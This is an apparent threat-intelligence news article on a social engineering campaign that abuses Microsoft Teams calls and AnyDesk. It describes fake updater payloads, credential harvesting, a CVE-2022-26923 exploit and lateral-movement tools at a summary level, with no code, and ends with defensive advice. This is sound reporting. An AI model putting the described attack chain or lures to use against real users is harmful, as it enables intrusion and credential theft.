On June 20, 2024, security researchers identified multiple intrusion attempts by threat actors utilizing techniques, tactics, and procedures (TTPs) consistent with an ongoing social engineering campaign, with AnyDesk and Microsoft Teams tools playing central roles in the hacking scheme.
These researchers observed significant evolution in the tools and payloads used by the threat actors during investigations of the aggressive campaign.
AnyDesk and Microsoft Teams Misused By Hackers
Researchers from Rapid7 observed that the campaign begins with an email bomb, followed by a phone call to the victim using Microsoft Teams. The threat actor then convinces the user to download and install AnyDesk, a remote access tool that allows the adversary to take control of the user’s computer. Once control is established, the threat actor executes payloads on the system and exfiltrates stolen data.
In some cases, the adversary has used credential harvesting scripts, such as a 32-bit .NET executable called AntiSpam.exe. This application pretends to be a spam filter updater, prompting the user to enter their credentials into a pop-up window. The entered credentials are saved to disk, along with system enumeration information. The executable has undergone changes across versions, indicating active development.
Following the credential harvesting, threat actors executed a series of binaries and PowerShell scripts to attempt to establish a connection with their command and control (C2) servers. Researchers had observed follow-on payloads with names like update1.exe, update4.exe, and update7.ps1, all of which stay consistent with the social engineering lure.
Payloads and Technical Analysis
These payloads include SystemBC malware, which acts as a dropper and socks proxy; Golang HTTP beacons, which seem to serve as a C2 framework; socks proxy beacons, which can route connections; and a Beacon Object File (BOF) that was converted from a Cobalt Strike module to a standalone executable. Of note, the payload update6.exe will attempt to exploit CVE-2022-26923 to add a machine account, which can then be used by the threat actor for Kerberoasting.
In addition, the researchers had observed the use of reverse SSH tunnels and the Level Remote Monitoring and Management (RMM) tool to facilitate lateral movement and retain access within compromised environments.
Researchers have analyzed several of the compiled payloads, revealing that many have been signed with the same certificate. The analysis of AntiSpam.exe, update1.exe, update2.dll, and update4.exe provides valuable insights into the techniques employed by the threat actors.
- AntiSpam.exe: This payload allocates a console window to display messages to the user, printing a fake loop 1023 times to the console window. The program then prompts the user to enter their credentials, which are validated using the ValidateCredentials method. The payload also executes enumeration commands via cmd.exe and saves the output to a file.
- update1.exe: This payload pretends to be an installer for Yandex Disk, but in reality, it loads, decrypts, and executes a second executable from an embedded resource using local PE injection.
- update2.dll: This payload presents itself as a fake AMD DirectX driver library, loading a second-stage executable payload via local PE injection. The second-stage payload reaches out to several C2 addresses using a Golang HTTP library.
- update4.exe: This payload appears to be a copy of APEX Scan, an antivirus scanner created by Trend Micro.
Conclusion
The threat actors behind this ongoing social engineering campaign have demonstrated a willingness to adapt their techniques, shifting from credential harvesting batch scripts to a .NET executable.
The following practices outlined by Cyble researchers can help in the first line of control against attackers.
- Prevent the execution of any unapproved RMM solutions within the environment.
- Block domains associated with all unapproved RMM solutions.
- Organizations should regularly conduct security awareness and information security training to identify and prevent common social engineering attacks.
- Keep your devices, operating systems, and applications updated.
- Use a reputable antivirus and internet security software package on your
system.